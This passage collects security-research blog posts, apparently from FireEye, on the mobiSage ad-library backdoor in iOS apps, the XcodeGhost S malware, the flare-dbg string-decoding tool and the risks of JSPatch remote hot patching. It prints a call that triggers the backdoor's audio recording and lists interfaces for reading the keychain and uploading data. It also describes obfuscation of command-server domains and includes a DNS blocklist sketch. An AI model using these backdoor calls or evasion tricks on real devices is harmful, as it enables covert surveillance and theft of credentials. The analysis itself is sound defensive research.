adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

 

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

 

 

Figure 8: Base64 encoded JavaScript component in zip format.
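For researchers who want to pull the bundle out of a sample themselves, a minimal Python sketch (the blob and output paths are hypothetical) that decodes the Base64 string and unpacks the zipped msageJS files looks like this:

    # A minimal sketch: decode the carved Base64 blob and extract the
    # zipped msageJS bundle (index.html, sdkjs.js, etc.).
    import base64
    import io
    import zipfile

    def extract_msagejs(b64_blob, out_dir="msageJS_dump"):
        raw = base64.b64decode(b64_blob)
        with zipfile.ZipFile(io.BytesIO(raw)) as bundle:
            bundle.extractall(out_dir)
            return bundle.namelist()

    # Usage: pass the Base64 string carved from the binary's data section.
    # print(extract_msagejs(open("msagejs_blob.b64").read()))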

 

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.

 

Figure 9: Server response to msageJS update request via HTTP POST

Conclusion

In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.

 

FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.

 

 

 

[1] http://www.adsage.com/mobisage

[2] http://www.adsage.cn/

[3] https://developer.apple.com/programs/ios/information/iOS_Program_Information_4_3_15.pdf

[4] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html

[5] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

[6] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html

[7] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

[8] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

 

 

 

 

XcodeGhost S: A New Breed Hits the US

By: Yong Kang
3 November 2015 at 12:27

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, the threat of XcodeGhost has maintained persistence and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost-related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to call back to during this time.

Figure 1. Top five countries XcodeGhost attempted to callback in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

Although most vendors have already updated their apps in the App Store, this chart indicates that many users in the field are still actively using older, infected versions of various apps. The version distribution varies among apps. For example, the infected versions of the two most popular apps, 网易云音乐 (Music 163) and WeChat, are listed in Figure 4.

App Name | Version | Incident Count (in 3 weeks)

WeChat | 6.2.5.19 | 2,963

网易云音乐 (Music 163) | 2.8.2 | 3,084

网易云音乐 (Music 163) | 2.8.3 | 2,664

网易云音乐 (Music 163) | 2.8.1 | 1,227

Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x, as illustrated in Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version of iOS 9 as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.
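A minimal sketch of that mitigation from the detection side (the indicator list and log format are placeholders; substitute your own resolver logs and the XcodeGhost CnC domains you track) might look like the following:

    # A minimal sketch: flag resolver log lines that reference known CnC
    # domains. The domain below is a placeholder, not a real indicator.
    BLOCKLIST = {"cnc.example.com"}

    def flag_queries(log_path):
        hits = []
        with open(log_path) as fh:
            for line in fh:
                if any(domain in line for domain in BLOCKLIST):
                    hits.append(line.strip())
        return hits

    for hit in flag_queries("dns_queries.log"):   # hypothetical log file
        print(hit)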

Given the number of infected devices detected within a short period among so many U.S enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S
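The same check can be reproduced on the analysis side. The short Python sketch below (the plist path is hypothetical) reads the NSAllowsArbitraryLoads exception from an app’s Info.plist, which is what determines whether a plain-HTTP callback would be permitted under the iOS 9 App Transport Security defaults:

    # A minimal sketch: read the ATS exception that XcodeGhost S keys on.
    import plistlib

    def allows_arbitrary_loads(info_plist_path):
        with open(info_plist_path, "rb") as fh:
            info = plistlib.load(fh)
        ats = info.get("NSAppTransportSecurity", {})
        return bool(ats.get("NSAllowsArbitraryLoads", False))

    print(allows_arbitrary_loads("Payload/Example.app/Info.plist"))  # hypothetical path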

Further, in XcodeGhost S the CnC domain strings are concatenated character by character to bypass static detection; this behavior is shown in Figure 7.

Figure 7: Construct the CnC domain character by character
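The idea is simple but effective against signature matching. The toy Python sketch below (with a placeholder domain, not a real indicator) shows why a plain strings or grep sweep of the binary never sees the full domain:

    # A toy illustration of the obfuscation in Figure 7: the domain only
    # exists as individual characters until it is assembled at runtime.
    PARTS = list("cnc.example.com")      # placeholder, not a real indicator

    domain = ""
    for ch in PARTS:
        domain += ch                     # reassembled one character at a time

    print(domain)                        # "cnc.example.com"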

The FireEye iOS dynamic analysis platform has successfully detected an app (“自由邦”) [2] infected by XcodeGhost S, and this app has been taken down from the App Store in cooperation with Apple. It is a shopping app for travellers that was available in both the U.S. and China App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest version. For the apps Apple has removed, users should delete them and switch to uninfected alternatives on the App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.

[1] https://developer.apple.com/library/prerelease/ios/technotes/App-Transport-Security-Technote/
[2] https://itunes.apple.com/us/app/id915233927
[3] http://drops.wooyun.org/papers/9024
[4] https://itunes.apple.com/us/app/pdf-reader-annotate-scan-sign/id368377690?mt=8
[5] https://itunes.apple.com/us/app/winzip-leading-zip-unzip-cloud/id500637987?mt=8
[7] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[8] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[9] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[10] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html

iBackDoor: High-Risk Code Hits iOS Apps

4 November 2015 at 18:00

Introduction

FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of the mobiSage SDK. Among these, we observed more than 900 attempts to contact an adSage ad server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities, such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to the server and eventually downloaded and executed by affected apps.

Technical Details

As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name | Interfaces

MSageCoreUIManagerPlugin | - captureAudio:  - captureImage:  - openMail:  - openSMS:  - openApp:  - openInAppStore:  - openCamera:  - openImagePicker:  - ...

MSageCoreLocation | - start:  - stop:  - setTimer:  - returnLocationInfo:webViewId:  - ...

MSageCorePluginFileModule | - createDir  - deleteDir:  - deleteFile:  - createFile:  - getFileContent:  - ...

MSageCoreKeyChain | - writeKeyValue:  - readValueByKey:  - resetValueByKey:

MSageCorePluginNetWork | - sendHttpGet:  - sendHttpPost:  - sendHttpUpload:  - ...

MSageCoreEncryptPlugin | - MD5Encrypt:  - SHA1Encrypt:  - AESEncrypt:  - AESDecrypt:  - DESEncrypt:  - DESDecrypt:  - XOREncrypt:  - XORDecrypt:  - RC4Encrypt:  - RC4Decrypt  - ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps as shown in Figure 4. As we have highlighted in previous blogs [footnotes 3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

Figure 8: Base64 encoded JavaScript component in Zip format

When msageJS is launched, it sends a POST request to hxxp://entry.adsage.com/d/ to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.

Conclusion

In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.

[1] http://www.adsage.com/mobisage
[2] http://www.adsage.cn/
[3] https://www.fireeye.com/blog/threat-research/2015/08/ios_masque_attackwe.html
[4] https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
[5] https://www.fireeye.com/blog/threat-research/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
[6] https://www.fireeye.com/blog/threat-research/2015/06/three_new_masqueatt.html
[7] https://www.virusbtn.com/virusbulletin/archive/2014/11/vb201411-Apple-without-shell

FLARE Script Series: Automating Obfuscated String Decoding

28 December 2015 at 14:01
Introduction

We are expanding our script series beyond IDA Pro. This post extends the FireEye Labs Advanced Reverse Engineering (FLARE) script series to an invaluable tool for the reverse engineer – the debugger. Just like IDA Pro, debuggers have scripting interfaces. For example, OllyDbg uses an asm-like scripting language, the Immunity debugger contains a Python interface, and Windbg has its own language. None of these options is ideal for rapidly creating string decoding debugger scripts: both Immunity and OllyDbg only support 32-bit applications, and Windbg’s scripting language is specific to Windbg and, therefore, not as well known. The pykd project was created to interface between Python and Windbg to allow debugger scripts to be written in Python. Because malware reverse engineers love Python, we built our debugger scripting library on top of pykd for Windbg.

Here we release a library we call flare-dbg. This library provides several utility classes and functions to rapidly develop scripts to automate debugging tasks within Windbg. Stay tuned for future blog posts that will describe additional uses for debugger scripts!

String Decoding

Malware authors like to hide the intent of their software by obfuscating its strings. Quickly deobfuscating those strings helps you figure out what the malware is doing.

As stated in Practical Malware Analysis, there are generally two approaches to deobfuscating strings: self-decoding and manual programming. The self-decoding approach lets the malware decode its own strings. Manual programming requires the reverse engineer to reimplement the decoding logic. A subset of the self-decoding approach is emulation, where the execution of each assembly instruction is emulated. Unfortunately, library call emulation is required, and emulating every library call is difficult and may cause inaccurate results. In contrast, a debugger is attached to the actual running process, so all the library functions can be run without issue. Each of these approaches has its place, but this post teaches a way to use debugger scripting to automatically self-decode all obfuscated strings.
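As a toy example of the manual-programming approach (the encoding scheme and bytes here are hypothetical, purely for illustration), once the decoding logic has been reverse engineered it can simply be reimplemented and run over the encoded data without ever executing the malware:

    # A toy manual reimplementation of a hypothetical rolling single-byte
    # XOR decoder; real samples require reversing the actual algorithm.
    def xor_decode(encoded, key=0x5A):
        out = bytearray()
        for i, b in enumerate(encoded):
            out.append(b ^ ((key + i) & 0xFF))
        return out.decode("ascii", errors="replace")

    # Hypothetical encoded bytes; decodes to "Hello" under the scheme above.
    print(xor_decode(bytes([0x12, 0x3E, 0x30, 0x31, 0x31])))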

Challenge

To decode all obfuscated strings, we need to find the following: the string decoder function, each location where it is called, and the arguments to each of those calls. We then need to run the function and read out the result. The challenge is to do this in a semi-automated way.

Approach

The first task is to find the string decoder function and get a basic understanding of its inputs and outputs. The next task is to identify each location where the string decoder function is called and all of the arguments to each call. For binary analysis outside of IDA, a handy Python project is Vivisect. Vivisect contains several heuristics for identifying functions and cross-references. Additionally, Vivisect can emulate and disassemble a series of opcodes, which can help us identify function arguments. If you haven’t already, be sure to check out the FLARE script series post on tracking function arguments using emulation, which also uses Vivisect.

Introducing flare-dbg

The FLARE team is introducing a Python project, flare-dbg that runs on top of pykd. Its goal is to make Windbg scripting easy. The heart of the flare-dbg project lies in the DebugUtils class, which contains several functions to handle:

·      Memory and register manipulation
·      Stack operations
·      Debugger execution
·      Breakpoints
·      Function calling

In addition to the basic debugger utility functions, the DebugUtils class uses Vivisect to handle the binary analysis portion.

Example

I wrote a simple piece of malware that hides strings by encoding them. Figure 1 shows an HTTP User-Agent string being decoded by a function I named string_decoder.

Figure 1: String decoder function reference in IDA Pro

After a cursory look at the string_decoder function, the arguments are identified as an offset to an encoded string of bytes, an output address, and a length. In other words, the function has a C prototype of the form string_decoder(encoded_bytes, output_buffer, length).

Now that we have a basic understanding of the string_decoder function, we test decoding using Windbg and flare-dbg. We begin by starting the process with Windbg and executing until the program’s entry point. Next, we start a Python interactive shell within Windbg using pykd and import flaredbg.

Next, we create a DebugUtils object, which contains the functions we need to control the debugger.

We then allocate 0x3A bytes of memory for the output string. We use the newly allocated memory as the second parameter and set up the remainder of the arguments.

Finally, we call the string_decoder function at virtual address 0x401000, and read the output string buffer.
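Put together, the interactive session described in the last few paragraphs looks roughly like the sketch below. DebugUtils and its call function come from the text above; the malloc and read_string helper names, and the offset of the encoded bytes, are assumptions made for illustration.

    # A condensed sketch of the interactive decoding session; run from the
    # pykd Python shell inside Windbg after breaking at the entry point.
    import flaredbg

    dbg = flaredbg.DebugUtils()

    out_addr = dbg.malloc(0x3A)            # buffer for the decoded output (assumed helper)
    args = [0x4054A8,                      # offset of the encoded bytes (hypothetical)
            out_addr,                      # output buffer we just allocated
            0x3A]                          # length

    dbg.call(0x401000, args)               # string_decoder virtual address from the text
    print(dbg.read_string(out_addr))       # decoded string, e.g. the User-Agent (assumed helper)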

After proving we can decode a string with flare-dbg, let’s automate all calls to the string_decoder function. An example debugger script is shown in Figure 2. The full script is available in the examples directory in the github repository.

Figure 2. Example basic debugger script

Let’s break this script down. First, we identify the function virtual address of the string decoder function and create a DebugUtils object. Next, we use the DebugUtils function get_call_list to find the three push arguments for each time string_decoder is called.

Once the call_list is generated, we iterate all calling addresses and associated arguments. In this example, the output string is decoded to the stack. Because we are only executing the string decoder function and won’t have the same stack setup as the malware, we must allocate memory for the output string. We use the third parameter, the length, to specify the size of the memory allocation. Once we allocate memory for the output string, we set the newly allocated memory address as the second parameter to receive the output bytes.

Finally, we run the string_decoder function by using the DebugUtils call function and read the result from our allocated buffer. The call function sets up the stack, sets any specified register values, and executes the function. Once all strings are decoded, the final step is to get these strings back into our IDB. The utils script contains utility functions to create IDA Python scripts. In this case, we output an IDA Python script that creates comments in the IDB.
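A condensed sketch of that loop is shown below; get_call_list, call, and DebugUtils follow the text, while the exact return layout of get_call_list and the malloc/read_string helpers are assumptions. The complete working script lives in the examples directory of the repository.

    # A sketch of the automation loop: decode the string at every call site
    # of string_decoder and collect the results keyed by calling address.
    import flaredbg

    DECODER_VA = 0x401000
    dbg = flaredbg.DebugUtils()

    results = {}
    # Assumed layout: each entry is (call site, (encoded offset, stack output
    # address, length)) for the three pushed arguments.
    for call_va, (enc_off, _stack_out, length) in dbg.get_call_list(DECODER_VA):
        buf = dbg.malloc(length)                       # decode into our own buffer
        dbg.call(DECODER_VA, [enc_off, buf, length])
        results[call_va] = dbg.read_string(buf)

    # These results can then be written out as an IDA Python script that adds
    # repeatable comments at each call site, as described above.
    for va, decoded in sorted(results.items()):
        print(hex(va), decoded)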

Running this debugger script produces the following output:

The output IDA Python script creates repeatable comments on all encoded string locations, as shown in Figure 3.

Figure 3. Decoded string as comment

Conclusion

Stay tuned for another debugger scripting series post that will focus on plugins! For now, head over to the flare-dbg GitHub project page to get started. The project requires pykd, winappdbg, and vivisect.

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching

By: Jing Xie
27 January 2016 at 13:00

Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFinishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.     Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: /System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

